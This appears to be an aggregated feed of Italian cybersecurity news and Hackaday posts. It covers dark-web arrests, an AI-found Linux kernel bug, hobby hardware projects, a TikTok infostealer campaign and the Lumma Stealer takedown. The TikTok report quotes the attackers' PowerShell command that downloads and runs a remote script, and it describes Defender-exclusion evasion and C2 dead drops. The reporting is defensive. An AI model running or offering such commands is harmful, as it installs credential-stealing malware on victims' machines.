Un’operazione globale di contrasto coordinata dall’Europol ha inferto un duro colpo alla criminalità underground, con 270 arresti tra venditori e acquirenti del dark web in dieci paesi. Nota come Operazione RapTor, questa operazione internazionale ha smantellato reti dedite al traffico di droga, armi e merci contraffatte, inviando un chiaro segnale ai criminali che si nascondono dietro l’illusione dell’anonimato.

I sospettati sono stati identificati attraverso indagini coordinate basate sull’intelligence derivante dalle chiusure dei marketplace del dark web Nemesis, Tor2Door, Bohemia e Kingdom Markets. Molti avevano effettuato migliaia di vendite su marketplace illeciti, utilizzando strumenti di crittografia e criptovalute per coprire le proprie tracce, ma le forze dell’ordine sono state all’avanguardia.

Questa azione internazionale segue l’Operazione SpecTor del 2023, che portò a 288 arresti. Insieme, queste operazioni dimostrano la crescente capacità delle forze dell’ordine di penetrare il velo di segretezza del dark web.

I venditori del dark web smascherati

I 270 arresti sono avvenuti nei seguenti Paesi:

• Stati Uniti d’America: 130
• Germania: 42
• Regno Unito: 37
• Francia: 29
• Corea del Sud: 19
• Austria: 4
• Paesi Bassi: 4
• Brasile: 3
• Svizzera: 1
• Spagna: 1

Sono in corso le indagini per rintracciare e arrestare altri individui coinvolti in reati sul dark web.

Milioni sequestrati, armi recuperate

Parallelamente agli arresti, gli agenti hanno sequestrato:

• Oltre 184 milioni di euro in contanti e criptovalute
• Oltre 2 tonnellate di droghe, tra cui anfetamine, cocaina, ketamina, oppioidi e cannabis
• Oltre 180 armi da fuoco, insieme a finte armi, taser e coltelli
• 12.500 prodotti contraffatti
• Oltre 4 tonnellate di tabacco illegale

Questi sequestri rappresentano una grave interruzione delle catene di approvvigionamento criminali che alimentano l’economia del dark web.

Il ruolo dell’Europol

Europol ha supportato l’azione compilando e analizzando pacchetti di intelligence basati sui dati provenienti dai tre mercati sequestrati. Questi pacchetti sono stati poi condivisi con le autorità nazionali nell’ambito della Joint Cybercrime Action Taskforce, ospitata presso la sede centrale di Europol, per consentire indagini mirate.

Questo modello operativo, utilizzato anche nell’operazione SpecTor del 2023, dimostra che l’arresto di una piattaforma criminale non è la fine della storia, bensì l’inizio di indagini successive volte a identificare e arrestare i venditori di alto valore.

Edvardas Šileris, Capo del Centro europeo per la criminalità informatica di Europol ha riportato “L’operazione RapTor dimostra che il dark web non è al di fuori della portata delle forze dell’ordine. Grazie a una stretta collaborazione e alla condivisione di informazioni, agenti di quattro continenti hanno identificato e arrestato sospetti, inviando un messaggio chiaro a coloro che pensano di potersi nascondere nell’ombra. Europol continuerà a collaborare con i nostri partner per rendere internet più sicuro per tutti.”

Cambiando tattica, stessa minaccia

Le recenti operazioni stanno rimodellando il panorama del dark web. Con i marketplace tradizionali sottoposti a crescente pressione, i criminali si stanno spostando verso negozi più piccoli, gestiti da un singolo venditore, per evitare le commissioni dei marketplace e ridurre al minimo l’esposizione.

Le droghe illegali continuano a essere la merce più venduta sul dark web, ma il 2023 ha visto anche un’impennata del traffico di farmaci da prescrizione e un incremento dei servizi fraudolenti, tra cui falsi sicari e annunci fasulli progettati per truffare gli acquirenti. Nonostante questi cambiamenti, il messaggio è chiaro: nessuna piattaforma è al di fuori della portata degli sforzi coordinati delle forze dell’ordine a livello internazionale.

Questa azione globale è stata resa possibile grazie alla stretta collaborazione tra le seguenti autorità:

• Austria : Servizio di intelligence criminale austriaco con vari dipartimenti provinciali di polizia criminale (Bundeskriminalamt und Landeskriminalämter)
• Brasile : Polizia Civile dello Stato del Pará (Polícia Civil do Estado do Pará) e Polizia Civile dello Stato di San Paolo (Polícia Civil do Estado do São Paulo)
• Francia : dogana francese (Douane), gendarmeria nazionale (Gendarmerie Nationale)
• Germania : Ufficio federale di polizia criminale (Bundeskriminalamt); Procura di Colonia – Punto di contatto centrale per la criminalità informatica (Staatsanwaltschaft Köln, Zentral- und Ansprechstelle Cybercrime); Centrale investigativa criminale di Oldenburg (Zentrale Kriminalinspektion Oldenburg); vari dipartimenti di polizia (Dienststellen der Länderpolizeien); Investigazione doganale tedesca (Zollfahndungsämter)
• Paesi Bassi : Team High Tech Crime (Indagini nazionali e operazioni speciali (NIS) e Post Interventie Team (PIT); ​​Intelligence nazionale, competenza e supporto operativo (NIEO)
• Spagna : Polizia nazionale (Policía Nacional)
• Corea del Sud : Ufficio del Procuratore del Distretto Centrale di Seul – Unità Investigativa Darknet
• Svizzera : Polizia cantonale di Zurigo (Kantonspolizei Zürich) e Procura II del Cantone di Zurigo (Staatsanwaltschaft II)
• Regno Unito : National Crime Agency (NCA); National Police Chiefs’ Council (NPCC)
• Stati Uniti : Dipartimento di Giustizia (DOJ) con le agenzie partner JCODE (Federal Bureau of Investigation (FBI) e Drug Enforcement Administration (DEA); Food and Drug Administration (FDA) – Office of Criminal Investigations; Homeland Security Investigations (HSI); Internal Revenue Service (IRS) – Criminal Investigation; US Postal Inspection Service (USPIS); Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF); Army Criminal Investigation Division (Army-CID); Customs and Border Protection (CBP); Dipartimento di Giustizia (DOJ); Department of the Treasury Financial Crimes Enforcement Network (FinCEN); Department of the Treasury Office of Foreign Assets Control (OFAC); Naval Criminal Investigative Service (NCIS))

L'articolo Europol Operazione RapTor: 270 arresti e 184 milioni sequestrati. Crollano i mercati del Dark Web proviene da il blog della sicurezza informatica.

Una vulnerabilità zero-day nel kernel Linux, è stata scoperta utilizzando il modello o3 di OpenAI. Questa scoperta, alla quale è stata assegnata la vulnerabilità CVE-2025-37899, segna un significativo progresso nella ricerca sulle vulnerabilità assistite dall’intelligenza artificiale.

La vulnerabilità, ufficialmente confermata il 20 maggio 2025, colpisce il componente ksmbd del kernel Linux, un server interno che implementa il protocollo SMB3 per la condivisione di file in rete. Il problema risiede in una condizione di tipo use-after-free all’interno del gestore del comando logoff, che può portare a gravi implicazioni in termini di sicurezza. Nello specifico, durante l’elaborazione di un comando di disconnessione, un thread libera l’oggetto sess->user. Tuttavia, se un’altra connessione tenta nel frattempo di riconfigurare la sessione già liberata, può accedere alla stessa struttura in memoria, causando un comportamento indefinito e potenzialmente pericoloso.

A rendere ancora più rilevante la scoperta è il fatto che la vulnerabilità è stata individuata da un’intelligenza artificiale. Sean, il ricercatore che l’ha rilevata, ha dichiarato: “L’ho trovata utilizzando esclusivamente l’API del modello o3 di OpenAI: niente strumenti avanzati, niente framework, solo puro linguaggio naturale”. Secondo Sean, si tratta con ogni probabilità della prima vulnerabilità mai scoperta pubblicamente da un modello linguistico di grandi dimensioni (LLM), dimostrando come l’IA abbia ormai raggiunto una capacità di comprensione del codice tale da rappresentare un reale alleato (o minaccia) nella sicurezza informatica.

Tali vulnerabilità possono causare il danneggiamento della memoria e potenzialmente consentire agli aggressori di eseguire codice arbitrario con privilegi del kernel. Il modello o3 di OpenAI, pubblicato il 16 aprile 2025, rappresenta un significativo progresso nelle capacità di ragionamento dell’IA. Il modello è progettato per “pensare più a lungo prima di rispondere” e dimostra prestazioni sostanzialmente migliorate in compiti complessi, tra cui programmazione e matematica.

La sua capacità di comprendere strutture di codice complesse e di ragionare su operazioni simultanee si è rivelata fondamentale per identificare questa vulnerabilità. “Con o3, gli LLM hanno fatto un balzo in avanti nella loro capacità di ragionare sul codice, e se lavori nella ricerca sulle vulnerabilità, dovresti iniziare a prestargli molta attenzione”, ha osservato Sean. “Ora sono a un punto in cui possono renderti significativamente più efficiente ed efficace.”

Gli esperti di sicurezza attribuiscono a questa vulnerabilità un punteggio di gravità elevato, sebbene l’Exploit Prediction Scoring System (EPSS) attualmente stimi una probabilità di sfruttamento relativamente bassa, pari allo 0,02%. La vulnerabilità interessa diverse versioni del kernel Linux fino alla 6.12.27, 6.14.5 e 6.15-rc4 .

Le distribuzioni Linux, inclusa SUSE, stanno già lavorando alle patch. Il team di sicurezza di SUSE attualmente classifica il problema come di “gravità moderata”. Gli utenti sono invitati ad installare gli aggiornamenti non appena disponibili.

L'articolo Scoperto il primo bug 0day da una AI sul kernel Linux! Un punto di svolta nel bug hunting? proviene da il blog della sicurezza informatica.

If you grew up with a beige Atari ST on your desk and a faint feeling of being left out once Doom dropped in 1993, brace yourself — the ST strikes back. Thanks to [indyjonas]’s incredible hack, the world now has a working port of DOOM for the Atari STe, and yes — it runs. It’s called STDOOM, and even though it needs a bit of acceleration or emulation to perform, it’s still an astonishing feat of retro-software necromancy.

[indyjonas] did more than just recompile and run: he stripped out chunks of PC-centric code, bent GCC to his will (cheers to Thorsten Otto’s port), and shoehorned Doom into a machine never meant to handle it. That brings us a version that runs on a stock machine with 4MB RAM, in native ST graphics modes, including a dithered 16-colour mode that looks way cooler than it should. The emotional punch? This is a love letter to the 13-year-old Jonas who watched Doom from the sidelines while his ST chugged along faithfully. A lot of us were that kid.

Sound is still missing, and original 8MHz hardware won’t give you fluid gameplay just yet — but hey, it’s a start. Want to dive in deeper? Read [indyjonas]’ thread on X.

hackaday.com/2025/05/22/runnin…

Electrostatic droplet capture system installed on an HVAC condenser. (Credit: Infinite Cooling)
As a common feature with thermal power plants, cooling towers enable major water savings compared to straight through cooling methods. Even so, the big clouds of water vapor above them are a clear indication of how much cooling water is still effectively lost, with water vapor also having a negative impact on the environment. Using so-called plume abatement the amount of water vapor making it into the environment can be reduced, with recently a trial taking place at a French nuclear power plant.

This trial featured electrostatic droplet capture by US-based Infinite Cooling, which markets it as able to be retrofitted to existing cooling towers and similar systems, including the condensers of office HVAC systems. The basic principle as the name suggests involves capturing the droplets that form as the heated, saturated air leaves the cooling tower, in this case with an electrostatic charge. The captured droplets are then led to a reservoir from which it can be reused in the cooling system. This reduces both the visible plume and the amount of cooling water used.

In a 2021 review article by [Shuo Li] and [M.R. Flynn] in Environmental Fluid Mechanics the different approaches to plume abatement are looked at. Traditional plume abatement designs use parallel streams of air, with the goal being to have condensation commence as early as possible rather than after having been exhausted into the surrounding air. Some methods used a mesh cover to provide a surface to condense on, while a commercially available technology are condensing modules which use counterflow in an air-to-air heat exchanger.

Other commercial solutions include low-profile, forced-draft hybrid cooling towers, yet it seems that electrostatic droplet capture is a rather new addition here. With even purely passive systems already seeing ~10% recapturing of lost cooling water, these active methods may just be the ticket to significantly reduce cooling water needs without being forced to look at (expensive) dry cooling methods.

Top image: The French Chinon nuclear power plant with its low-profile, forced-draft cooling towers. (Credit: EDF/Marc Mourceau)

hackaday.com/2025/05/22/recove…

Typing can be difficult to learn at the best of times. Until you get the muscle memory down, it can be quite challenging. However, if you’ve had one or more fingers amputated, it can be even more difficult. Just reaching the keys properly can be a challenge. To help in this regard, [Roei Weiman] built some assistive typing tools for those looking for a little aid at the keyboard.

The devices were built for [Yoni], who works in tech and has two amputated fingers. [Roei] worked on many revisions to create a viable brace and extension device that would help [Yoni] type with greater accuracy and speed.

While [Roei] designed the parts for SLS 3D printing, it’s not mandatory—these can easily be produced on an FDM printer, too. For SLS users, nylon is recommended, while FDM printers will probably find best results with PETG. It may also be desirable to perform a silicone casting to add a grippier surface to some of the parts, a process we’ve explored previously.

The great thing about 3D printing is that it enables just about anyone to have a go at producing their own simple assistive aids like these. Files are on Instructables for the curious. Video after the break.

youtube.com/embed/OaDDa5VRGVM?…

hackaday.com/2025/05/22/you-ca…

If you want a regular table saw, you’re probably best off just buying one—it’s hard to beat the economies of scale that benefit the major manufacturers. If you want a teeny one, though, you might like to build it yourself. [Maciej Nowak] has done just that.

The concept is simple enough; a small motor and a small blade make a small table saw. [Maciej] sourced a remarkably powerful 800-watt brushless motor for the build. From there, the project involved fabricating a suitable blade mount, belt drive, and frame for the tool. Some time was well-spent on the lathe producing the requisite components out of steel and aluminum, as well as a stout housing out of plywood. The motor was then fitted with a speed controller, with the slight inconvenience that it’s a hobby unit designed to run off DC batteries rather than a wall supply. Ultimately, though, this makes the saw nicely portable. All that was left to do was to fit the metal top plate, guides, and a suitably small 3″ saw blade to complete the build.

We’ve seen mini machine tools like these before, too. They can actually be pretty useful if you find yourself regularly working on tiny little projects. Video after the break.

youtube.com/embed/i17Ciew4Pcg?…

hackaday.com/2025/05/22/buildi…

Some projects start as hacks, and end as products — that’s the case for [Akio Sato]’s project Loko, the LoRa/GPS tracker that was entered in our 2025 Pet Hacks Contest. The project dates all the way back to 2019 on Hackaday.io, and through its logs you can see its evolution up to the announcement that Loko is available from SeeedStudio.

It’s not a device necessarily limited to pets. In fact, the original use case appears to have been a backup locator beacon for lost drones. But it’s still a good fit for the contest none-the-less: at 12 grams, the tiny tracking device won’t bother even the most diminutive of pups, and will fit on any collar at only 30 mm x 23 mm. The “ground station” that pairs with your phone is a bit bigger, of course, but unless you have a Newfoundlander or a St. Bernard you’re likely bigger than fido. The devices use LoRa to provide a range up to 15 km — maybe better if you can loop them into a LoRaWAN. Depending on how often you pin the tracker, it can apparently last for as long as 270 days, which we really hope you won’t need to track a missing pet.

The hardware is based around Seeed’s Wio-E5 LoRa chip, which packages an STM32 with a LoRA radio. The firmware is written in MicroPython, and everything is available via GitHub under the MIT license. Though the code for the mobile app that interfaces with that hardware doesn’t appear to be in the repository at the moment. (There are folders, but they’re disappointingly empty.) The apps are available free on the iOS App Store and Google Play, however.

There’s still plenty of time to submit your own hacks to the Pet Hacks Contest, so please do! You have until April 25th, so if you haven’t started yet, it’s not too late to get hacking.

hackaday.com/2025/05/22/2025-p…

We’re tremendously excited to be able to announce that the Hackaday Supercon is on for 2025, and will be taking place October 31st through November 2nd in Pasadena, California.

Supercon is about bringing the Hackaday community together to share our great ideas, big and small. So get to brainstorming, because we’d like to hear what you’ve been up to! Like last year, we’ll be featuring both longer and shorter talks, and hope to get a great mix of both first-time presenters and Hackaday luminaries. If you know someone you think should give a talk, point them here.

The Call for Participation form is online now, and you’ve got until July 3rd to get yourself signed up.

Honestly, just the people that Supercon brings together is reason enough to attend, but then you throw in the talks, the badge-hacking, the food, and the miscellaneous shenanigans … it’s an event you really don’t want to miss. And as always, presenters get in for free, get their moment in the sun, and get warm vibes from the Hackaday audience. Get yourself signed up now!

We’ll have more news forthcoming in the next few weeks, including the start of ticket sales, so be sure to keep your eyes on Hackaday.

hackaday.com/2025/05/22/hackad…

If you work with virtual machines, perhaps to spin up a clean OS install for testing, historically you have either bitten the bullet and used one of the commercial options, or spent time getting your hands dirty with something open source. Over recent years that has changed, with the arrival of open source graphical applications for effortless VM usage. We’ve used GNOME Boxes here to make our lives a lot easier. Now KDE are also joining the party with Karton, a project which will deliver what looks very similar to Boxes in the KDE desktop.

The news comes in a post from Derek Lin, and shows us what work has already been done as well as a roadmap for future work. At the moment it’s in no way production ready and it only works with QEMU, but it can generate new VMs, run them, and capture their screens to a desktop window. Having no wish to join in any Linux desktop holy wars we look forward to seeing this piece of software progress, as it’s a Google Summer Of Code project we hope there will be plenty more to see shortly.

Still using the commercial option? You can move to open source too!

hackaday.com/2025/05/22/now-kd…

If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.

In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.

Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, so electric current occurs. As a byproduct, many fuel cells produce potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.

youtube.com/embed/V3ChCroWttY?…

History

Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid, copper sulphate, along with sheet metal and porcelain. Today, the phosphoric acid fuel cell is similar to Grove’s design.

The Bacon fuel cell is due to Francis Thomas Bacon and uses alkaline fuel. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after the developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.

One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. There are already gas tanks available, and you can always use water.

Types of Fuel Cells

Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again, a reaction with more fuel and a catalyst produces the byproduct: hydrogen and oxygen form water.

Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.

Common types include:

• Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
• Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
• Phosphoric acid – Another acid-based technology that operates at hotter temperatures.
• Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
• Solid oxide – Another high temperature that uses zirconia ceramic as the electrolyte.

In addition to technology, you can consider some fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.

Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel it and — if you want efficiency — you need a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. It is possible to use the heat directly or to convert it to electricity in a more conventional way.

Space

Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early fuel cells in the video below.

youtube.com/embed/OouXKyroV4w?…
Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. However, in 1967, NASA started using Nafion from DuPont, which was improved over the old membranes.

However, alkaline cells had vastly improved power density, and from Apollo on, these cells, using a potassium hydroxide electrolyte, were standard issue.

Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).

The shuttle’s power plant measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW. However, they typically were taxed at about 50% capacity. Each orbiter’s power plant contained 96 individual cells connected to achieve a 28-volt output.

Going Mobile

There have been attempts to make fuel cell cars, but with the difficulty of delivering, storing, and transporting hydrogen, there has been resistance. The Toyota Mirai, for example, costs $57,000, yet owners sued because they couldn’t obtain hydrogen. Some buses use fuel cells, and a small number of trains (including the one mentioned in the video below).

youtube.com/embed/0d0h42IZlWU?…

Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.

There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.

Can You DIY?

We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.

youtube.com/embed/NE6dxzDeWbI?…

Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]

hackaday.com/2025/05/22/a-brie…

In un preoccupante segnale dell’evoluzione delle tattiche cybercriminali, i threat actor stanno ora sfruttando la popolarità di TikTok come canale per la distribuzione di malware avanzati progettati per il furto di informazioni. L’ultima campagna in circolazione si concentra sulla diffusione degli infostealer Vidar e StealC, inducendo gli utenti a eseguire comandi PowerShell dannosi con il pretesto di attivare software legittimi o sbloccare funzionalità premium in applicazioni come Windows OS, Microsoft Office, CapCut e Spotify.

A differenza dei metodi tradizionali — come i siti web compromessi o le email di phishing — questo vettore d’attacco si basa esclusivamente su tecniche di ingegneria sociale veicolate tramite video. I criminali informatici realizzano video anonimi, spesso generati con strumenti di intelligenza artificiale, che guidano passo dopo passo le vittime nell’installazione inconsapevole del malware sui propri dispositivi.

Questo approccio è particolarmente insidioso perché non lascia alcun codice dannoso sulla piattaforma stessa che le soluzioni di sicurezza possano rilevare e tutti i contenuti fruibili vengono forniti in modo visivo e uditivo. I ricercatori di Trend Micro hanno identificato diversi account TikTok coinvolti in questa campagna, tra cui @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771.

La loro indagine ha rivelato che alcuni video hanno ottenuto un notevole successo: uno in particolare ha ottenuto oltre 20.000 “Mi piace”, 100 commenti e ha raggiunto circa 500.000 visualizzazioni. Questa ampia diffusione dimostra il potenziale impatto della campagna e sottolinea come la portata algoritmica di TikTok possa amplificare contenuti dannosi.

Le conseguenze per le vittime sono gravi, poiché questi ladri di informazioni possono sottrarre dati sensibili, rubare credenziali e potenzialmente compromettere i sistemi aziendali. Una volta installato, il malware stabilisce una comunicazione con i server di comando e controllo, consentendo agli aggressori di raccogliere informazioni preziose dai dispositivi compromessi.

Meccanismo di infezione e analisi tecnica

La catena di infezione inizia quando gli utenti seguono le istruzioni video per aprire PowerShell (premendo Windows+R e digitando “powershell”) e quindi eseguono un comando simile a: iex (irm https://allaivo[.]me/spotify). Questo comando dall’aspetto innocuo scarica ed esegue uno script remoto (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) che avvia il processo di infezione.

Una volta eseguito, lo script crea delle directory nascoste nelle cartelle APPDATA e LOCALAPPDATA dell’utente, quindi aggiunge questi percorsi all’elenco di esclusione di Windows Defender: una sofisticata tecnica di elusione che aiuta il malware a evitare il rilevamento. Il malware procede quindi a scaricare ulteriori payload, tra cui i ladri di informazioni Vidar e StealC.

Queste varianti di malware sono particolarmente pericolose perché prendono di mira informazioni sensibili, tra cui password salvate, portafogli di criptovalute e cookie di autenticazione. Dopo l’installazione, il malware si connette a vari server di comando e controllo, tra cui servizi legittimi utilizzati in modo improprio.

Vidar, ad esempio, utilizza i profili Steam (hxxps://steamcommunity[.]com/profiles/76561199846773220) e i canali Telegram (hxxps://t[.]me/v00rd) come “Dead Drop Resolver” per nascondere la sua effettiva infrastruttura C&C, una tecnica che rende il tracciamento e l’interruzione più difficili. Ciò che rende questa campagna particolarmente efficace è il modo in cui fonde l’ingegneria sociale con lo sfruttamento tecnico.

Presentandosi come utili tutorial per accedere alle funzionalità premium dei software più diffusi, i video creano fiducia negli spettatori, che poi eseguono volentieri i comandi che compromettono i loro sistemi. Ciò rappresenta un’evoluzione significativa negli attacchi basati sui social media, dimostrando come gli autori delle minacce continuino ad adattare le proprie tattiche per sfruttare il comportamento degli utenti ed eludere i controlli di sicurezza tradizionali.

L'articolo Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware! proviene da il blog della sicurezza informatica.

Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.
Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.

[Bill] found a few mistakes that needed to be corrected, and was eventually able to get an ESP8266 (and eventually an ESP32) to control the unit thanks largely to the fact that it communicates using a slightly modified I2C protocol.

There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose as well. With that taken care of he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again as well, like building the amplifier for them from scratch from the get-go.

hackaday.com/2025/05/22/trashe…

DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.

Multiple rollers rest on a simple shaft allowing each roller to have independent rotation. This is important because having a circular crown gear for angled transmission creates different rotation speeds. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm with the actual adapter breaking before the gearbox showing decent strength.

Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears have great flexibility in their simplicity to make, having plastic on plastic is generally very difficult to get precise and long lasting. [Sergei]’s design allows for a highly complex crown gear to take advantage of 3D printing while allowing for simple rollers for improved strength and precision.

While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!

youtube.com/embed/VXcuryyRGbo?…

Thanks to [M] for the tip!

hackaday.com/2025/05/22/roller…

Nelle ultime ore si è assistito a un grande clamore mediatico riguardante il “takedown” dell’infrastruttura del noto malware-as-a-service Lumma Stealer, con un’operazione congiunta guidata dall’FBI, Europol, CISA e partner privati come Microsoft. L’azione ha colpito i sistemi di distribuzione e i canali di affitto del malware, mirando a interrompere una delle minacce cybercriminali più attive degli ultimi anni.

Tuttavia, come emerge anche dall’articolo di BleepingComputer e da verifiche indipendenti, è importante distinguere tra il successo tattico dell’operazione e l’effettiva capacità di neutralizzare l’infrastruttura di Lumma Stealer.

Secondo le dichiarazioni ufficiali, sono stati sequestrati oltre 2.300 domini legati a Lumma e chiuse alcune piattaforme di vendita e affitto del malware. Microsoft ha ottenuto un’ordinanza per disabilitare infrastrutture gestite attraverso registrar fraudolenti. Tuttavia, l’analisi tecnica suggerisce che il malware è ancora operativo in parte della sua rete.

Test condotti su campioni attivi mostrano che Lumma è ancora in grado di comunicare con server C2 non colpiti. Alcuni operatori underground hanno confermato disservizi temporanei risolti in tempi brevi. Questo dimostra che, pur rappresentando un’importante azione di disturbo, l’operazione non ha colpito in modo definitivo la catena operativa del malware.
Un pannello ancora attivo vs uno sequestrato

La sfida delle infrastrutture flessibili

Lumma, come altri infostealer, è progettato per essere resiliente. Le sue componenti infrastrutturali vengono ruotate frequentemente, i C2 vengono cambiati ogni giorno, e i panel di controllo sono distribuiti e replicabili. Questo rende difficile per le autorità infliggere un danno permanente solo attraverso il sequestro di domini. L’infrastruttura può riorganizzarsi rapidamente, grazie a backup e domini dormienti pronti all’attivazione.

Pressione anche sugli affiliati

Un elemento interessante è il presunto sequestro del canale Telegram ufficiale di Lumma, o quantomeno la sua compromissione da parte delle autorità. Dopo una prima comunicazione in lingua russa, è comparso un secondo messaggio in inglese attribuito direttamente al Federal Bureau of Investigation, rafforzato da un’immagine simbolica che mostra un uccello dietro le sbarre.

Il messaggio, rivolto agli abbonati del servizio, ringrazia ironicamente i membri del team Lumma per l'”ospitalità” concessa nel canale, accusando al contempo gli amministratori di non aver protetto i propri clienti.

Viene inoltre offerta la possibilità di contattare direttamente l’FBI tramite Telegram, Signal o email, in un apparente invito alla collaborazione o alla resa volontaria. La comunicazione chiude con una frase dal tono volutamente ambiguo: “se non ci contattate voi, non preoccupatevi: lo faremo noi”.

Questa manovra, se autentica, va oltre il semplice sequestro tecnico: rappresenta una forma di pressione psicologica mirata a erodere la fiducia degli utenti finali nel servizio stesso, scoraggiando future attività e instaurando un clima di panico o diffidenza all’interno dell’ecosistema criminale.

Il ruolo strategico degli attori privati

Uno degli aspetti più significativi di questa operazione è il coinvolgimento diretto di aziende private nella fase di intelligence, sequestro e disabilitazione tecnica dell’infrastruttura di Lumma Stealer. Microsoft ha avuto un ruolo centrale nell’ottenere un’ordinanza per il sequestro di domini gestiti da registrar fraudolenti.

ESET ha partecipato con attività di monitoraggio e analisi proattiva delle componenti malware, fornendo informazioni fondamentali sulle modalità di funzionamento di Lumma e supportando l’attribuzione degli elementi infrastrutturali. CleanDNS ha collaborato al blocco e alla de-registrazione dei domini malevoli, mentre Cloudflare ha contribuito con dati e strumenti di threat intelligence volti a contrastare le tecniche di evasione utilizzate da Lumma per mascherare il proprio traffico C2.

Questa sinergia tra pubblico e privato ha rappresentato una leva fondamentale per portare avanti un’operazione coordinata su scala globale, dimostrando come l’efficacia di una cyber-operazione oggi dipenda sempre più dalla collaborazione trasversale tra attori istituzionali e industria della sicurezza.

Gli infostealer superano i ransomware?

Questa operazione, sebbene non definitiva, rappresenta un’importante inversione di tendenza: si comincia a colpire sistematicamente un fenomeno in fortissima espansione. Gli stealer come Lumma stanno diventando il vero motore economico del cybercrime moderno.

La vendita massiva di log, credenziali, cookie e wallet esfiltrati avviene in modo automatico su marketplace underground e Telegram, generando profitti costanti, anche in assenza di estorsione diretta.

Il takedown parziale di Lumma Stealer rappresenta un risultato concreto, ma non ancora risolutivo. L’infrastruttura ha subito un colpo, ma non è stata smantellata del tutto. Il malware continua a circolare, anche se con meno efficienza.

È quindi fondamentale osservare le prossime mosse delle autorità: solo la continuità operativa e un cambio di passo strategico potranno incidere in modo duraturo su una minaccia che si è già evoluta oltre i confini del modello ransomware.

Fonti:

• bleepingcomputer.com/news/secu…
• cisa.gov/news-events/cybersecu…
• app.any.run/tasks/fb014a66-d52…
• welivesecurity.com/en/eset-res…
• cleandns.com/battling-lumma-st…
• bitsight.com/blog/lumma-steale…
• cloudflare.com/it-it/threat-in…
